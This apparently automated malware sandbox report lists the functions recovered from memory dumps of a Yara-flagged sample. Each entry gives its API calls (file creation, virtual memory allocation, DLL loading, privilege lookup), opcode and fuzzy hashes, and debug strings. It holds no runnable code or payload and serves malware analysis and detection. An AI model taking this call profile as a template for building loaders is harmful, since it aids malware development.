                                              • String ID: r=A
                                              • API String ID: 2738559852-3272039572
                                              • Opcode ID: 3fda8302a745f6d0dc515a54843582a3c587e0c9371b2845bf5982486568be46
                                              • Instruction ID: 8d100ade7d8425ab450efc8b4e74ffc931917f699a8f9b9575f5e8ba6d57f5b3
                                              • Opcode Fuzzy Hash: 3fda8302a745f6d0dc515a54843582a3c587e0c9371b2845bf5982486568be46
                                              • Instruction Fuzzy Hash: 9E01F2B6200209AFDB14DF89DC80DEB77ADEF8C750F108649FA5C97250CA30E8518BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: U
                                              • API String ID: 823142352-3372436214
                                              • Opcode ID: 03a4a1cc45d8bda0463e9f869ad61038ea4d5dcff9a4f34a4b7ee006ec967162
                                              • Instruction ID: 733587e318f7c0f853fa36bcaa40b7d539fc456fed80aa04045e977df97d7b95
                                              • Opcode Fuzzy Hash: 03a4a1cc45d8bda0463e9f869ad61038ea4d5dcff9a4f34a4b7ee006ec967162
                                              • Instruction Fuzzy Hash: 1201F6B2214109ABDB08CF99CC94EEB37EDAF8C354F058248FA1C97241C630E841CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 56a82b38fe5e0b6998b7b384a4c0c16e964e908876489ac66d020e7016346041
                                              • Instruction ID: 7f9ab8a9aae02877c6e5524ab60c3994cd968c8aac449638833a70e8da7e2222
                                              • Opcode Fuzzy Hash: 56a82b38fe5e0b6998b7b384a4c0c16e964e908876489ac66d020e7016346041
                                              • Instruction Fuzzy Hash: 13F085B2200109AFCB14CF98CC81EEB7BA9AF88344F018258FE08A7241C631E810CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 543913ec5c372887f4ab3246f84590100ba18f54384f7a095e9d5e4aa9a58780
                                              • Instruction ID: 9816c5c99cc2938753fd47addb6c34bfd29b686931307a244d208e6967aa8e9c
                                              • Opcode Fuzzy Hash: 543913ec5c372887f4ab3246f84590100ba18f54384f7a095e9d5e4aa9a58780
                                              • Instruction Fuzzy Hash: 739002A175110442D10061994424B064085E7E1342F91C015E1094554DC659CC627166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7d9864bbceb43c1f6103767d510e25e7df34d035aa18a70a8da8989a183836ca
                                              • Instruction ID: 642664d10c91f25429115b1bc575b4b295c224b4e3b0b80292eacaf06fa3ca5f
                                              • Opcode Fuzzy Hash: 7d9864bbceb43c1f6103767d510e25e7df34d035aa18a70a8da8989a183836ca
                                              • Instruction Fuzzy Hash: BB9002B161110402D140719944147464085A7D0342F91C011A5094554EC6998DE576A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: db80aa1d3e8a9f7263c701abba4ef70735b001ef8864021ca07454038d090382
                                              • Instruction ID: be532aef141b15316eccf9d50521497873ccb3a3f856b0155bc180befa8b470b
                                              • Opcode Fuzzy Hash: db80aa1d3e8a9f7263c701abba4ef70735b001ef8864021ca07454038d090382
                                              • Instruction Fuzzy Hash: ED900261A1110502D10171994414616408AA7D0282FD1C022A1054555ECA6589A2B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7618a8225548c726161c7ecb83133d50d7aaeb83b07f6ea42125a1f4f0853e38
                                              • Instruction ID: d5cd38a782bff297636f626da30448c558f72e63a3858a583a4ae4b64047997b
                                              • Opcode Fuzzy Hash: 7618a8225548c726161c7ecb83133d50d7aaeb83b07f6ea42125a1f4f0853e38
                                              • Instruction Fuzzy Hash: 39900261652141525545B19944145078086B7E02827D1C012A1444950CC5669866E661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ad0467ecb9ea126c4a925687fb00c996e9da50568872fa40c15f8de6a27d3e51
                                              • Instruction ID: 5211fe55fd01cef94ff738a2f5491d7f0b1c81bea76c8ddedeca647ea4681540
                                              • Opcode Fuzzy Hash: ad0467ecb9ea126c4a925687fb00c996e9da50568872fa40c15f8de6a27d3e51
                                              • Instruction Fuzzy Hash: D090027161110413D111619945147074089A7D0282FD1C412A0454558DD6968962B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 98d1b92ac28de68a9f20e25935d53117136b1462d4cb2c21088589d2a17f5c9f
                                              • Instruction ID: ca71c6c52d67154afb9e63ed7d303b972ee6308b8b5f39a0631d30a2e459ce77
                                              • Opcode Fuzzy Hash: 98d1b92ac28de68a9f20e25935d53117136b1462d4cb2c21088589d2a17f5c9f
                                              • Instruction Fuzzy Hash: 3790027161150402D1006199482470B4085A7D0343F91C011A1194555DC665886175B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e9d76cd30c624ebf76d21c1086db7036c82d3d30d89fba5490af5a3f30ac8ebc
                                              • Instruction ID: e0f96c419bcc80cab97d7361230747f33aec2c174329159f36cf6367aa8f843a
                                              • Opcode Fuzzy Hash: e9d76cd30c624ebf76d21c1086db7036c82d3d30d89fba5490af5a3f30ac8ebc
                                              • Instruction Fuzzy Hash: 17900261A1110042414071A988549068085BBE1252791C121A09C8550DC599887566A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 01b5e4e1f0c7d0065d5145386235ab809675ee0b5032e4785d245fb4a756524a
                                              • Instruction ID: 9a579c871b1cc3e27424d2e92b9c89ac691464df444d42ed9bdec631514e2280
                                              • Opcode Fuzzy Hash: 01b5e4e1f0c7d0065d5145386235ab809675ee0b5032e4785d245fb4a756524a
                                              • Instruction Fuzzy Hash: DE90026162190042D20065A94C24B074085A7D0343F91C115A0184554CC95588716561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 0615fedf8518b748efdb4554da09ef64cfc744839e0848ec9226f33df8f679f7
                                              • Instruction ID: 02d98754f289c7b5ea5734b7b03eb5fa5787f5b7a61e957be974c2f2169b3e4a
                                              • Opcode Fuzzy Hash: 0615fedf8518b748efdb4554da09ef64cfc744839e0848ec9226f33df8f679f7
                                              • Instruction Fuzzy Hash: 5E9002A161210003410571994424616808AA7E0242B91C021E1044590DC56588A17165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cc4042c8bf3950038aa019812b84e55fb82c3bfddeabdda6fa7b15a876e636b2
                                              • Instruction ID: d9083f295f5969e24348860615b89c130e1c3060d969fdcbcc7beb067ed7d344
                                              • Opcode Fuzzy Hash: cc4042c8bf3950038aa019812b84e55fb82c3bfddeabdda6fa7b15a876e636b2
                                              • Instruction Fuzzy Hash: 32900265621100030105A599071450740C6A7D5392391C021F1045550CD66188716161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 93c70b7762418804db0720841b44032bc1b6abad4aced3646b372f8e99e8ac96
                                              • Instruction ID: 662dc823a522b830230e335a18741dd48f39c976e454a89fe39e975aa4faf906
                                              • Opcode Fuzzy Hash: 93c70b7762418804db0720841b44032bc1b6abad4aced3646b372f8e99e8ac96
                                              • Instruction Fuzzy Hash: BC90026962310002D1807199541860A4085A7D1243FD1D415A0045558CC95588796361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ce1da050c6a5e34e4282fcaa82b09ac81cc114ce908ca53511246790f8881f63
                                              • Instruction ID: 65802abd14dc17810118db1b656356f3411540c075276893d221ec6bcdfec9e1
                                              • Opcode Fuzzy Hash: ce1da050c6a5e34e4282fcaa82b09ac81cc114ce908ca53511246790f8881f63
                                              • Instruction Fuzzy Hash: 4290026171110003D140719954286068085F7E1342F91D011E0444554CD95588666262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 970c2db13e23ca30ff51ef07f9b329267c26d1ac646f3736f4cfea37ce75d722
                                              • Instruction ID: cfdf180d8610aeb19a32096f73e07cfc880604372c2315287406f4deb505c5f4
                                              • Opcode Fuzzy Hash: 970c2db13e23ca30ff51ef07f9b329267c26d1ac646f3736f4cfea37ce75d722
                                              • Instruction Fuzzy Hash: BA90027172124402D110619984147064085A7D1242F91C411A0854558DC6D588A17162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8f127a774a21be541ea38796e366cce35ea6459ede9440ff7fab0ba03c43c2b1
                                              • Instruction ID: 12f81aad670a61805d5fde25088d283e673f11c22a273fecc7c51e41a4871261
                                              • Opcode Fuzzy Hash: 8f127a774a21be541ea38796e366cce35ea6459ede9440ff7fab0ba03c43c2b1
                                              • Instruction Fuzzy Hash: B590027161110402D10065D954186464085A7E0342F91D011A5054555EC6A588A17171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f4fcdf26e2a61606ebaef09e5b21d85a3583a253727faace0cde2e7fb006f875
                                              • Instruction ID: 50175adb350f4b1363d098bb74b7d27bb5d5f8adcb16e5e3052df36b79d5a263
                                              • Opcode Fuzzy Hash: f4fcdf26e2a61606ebaef09e5b21d85a3583a253727faace0cde2e7fb006f875
                                              • Instruction Fuzzy Hash: 5B90027161118802D1106199841474A4085A7D0342F95C411A4454658DC6D588A17161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                              • Instruction ID: cdd2eec4020fea086f6a144f2455970ee5c7f47f7fbe583e1b3f496f5aa23b15
                                              • Opcode Fuzzy Hash: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                              • Instruction Fuzzy Hash: 5C90027161110802D1807199441464A4085A7D1342FD1C015A0055654DCA558A6977E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                              • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                              • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                              • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                              • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateExitFreeProcess
                                              • String ID: 65A
                                              • API String ID: 725053265-2085483392
                                              • Opcode ID: b5966d64cfa625804b80cc4b0e66dc486d175339082e2e998d04b5d5827ebc5a
                                              • Instruction ID: 9c3963d56414f175e01917e4060537cab4c436d14e3d85f34ddb164a983611f4
                                              • Opcode Fuzzy Hash: b5966d64cfa625804b80cc4b0e66dc486d175339082e2e998d04b5d5827ebc5a
                                              • Instruction Fuzzy Hash: F8F08CB2204204AFDB04DF68DC84EEB3769EF98354F01855AF81897241CA31EA10CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: 65A
                                              • API String ID: 1279760036-2085483392
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c30af80c3aceb8291dbcb64bf18b81751b4d6adf1fcda52649cf80eee8412512
                                              • Instruction ID: 37e891c76849951da78b93b5df8a188ef4dbd3704d8e8d4c52fa450291bb30fa
                                              • Opcode Fuzzy Hash: c30af80c3aceb8291dbcb64bf18b81751b4d6adf1fcda52649cf80eee8412512
                                              • Instruction Fuzzy Hash: 21E022B16082842BEB10DF29CC85ED73FA8DF4A250F14869EFC881B103C839A805CBB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 35a55681eae33743cd0d6057b91a7961325ecede7546be1e6f30bada71947c7b
                                              • Instruction ID: 3d0636d200e137f4749ad09701b0b51fa855c974d35d62143ff315f7ff40091e
                                              • Opcode Fuzzy Hash: 35a55681eae33743cd0d6057b91a7961325ecede7546be1e6f30bada71947c7b
                                              • Instruction Fuzzy Hash: 4DE08C76604100BBD721DF58CC95FC737A8AF48390F2680A9B968AB281C630AE01CAE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                              • Instruction ID: 6d03cf7c32b9916c122347de86b11622598d43f9cfa442e57990470419eb66c3
                                              • Opcode Fuzzy Hash: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                              • Instruction Fuzzy Hash: FDB09B71D015D5C9D611D7A44608717798477D0746F56C061D1060641F4778C095F5F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Strings
                                              • write to, xrefs: 0199B4A6
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0199B2F3
                                              • The resource is owned exclusively by thread %p, xrefs: 0199B374
                                              • *** then kb to get the faulting stack, xrefs: 0199B51C
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0199B484
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B3D6
                                              • This failed because of error %Ix., xrefs: 0199B446
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0199B476
                                              • an invalid address, %p, xrefs: 0199B4CF
                                              • The resource is owned shared by %d threads, xrefs: 0199B37E
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0199B39B
                                              • Go determine why that thread has not released the critical section., xrefs: 0199B3C5
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0199B47D
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0199B53F
                                              • The critical section is owned by thread %p., xrefs: 0199B3B9
                                              • a NULL pointer, xrefs: 0199B4E0
                                              • *** enter .exr %p for the exception record, xrefs: 0199B4F1
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0199B2DC
                                              • <unknown>, xrefs: 0199B27E, 0199B2D1, 0199B350, 0199B399, 0199B417, 0199B48E
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0199B314
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0199B323
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0199B48F
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0199B352
                                              • *** enter .cxr %p for the context, xrefs: 0199B50D
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B38F
                                              • The instruction at %p referenced memory at %p., xrefs: 0199B432
                                              • read from, xrefs: 0199B4AD, 0199B4B2
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0199B305
                                              • *** Inpage error in %ws:%s, xrefs: 0199B418
                                              • The instruction at %p tried to %s , xrefs: 0199B4B6
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
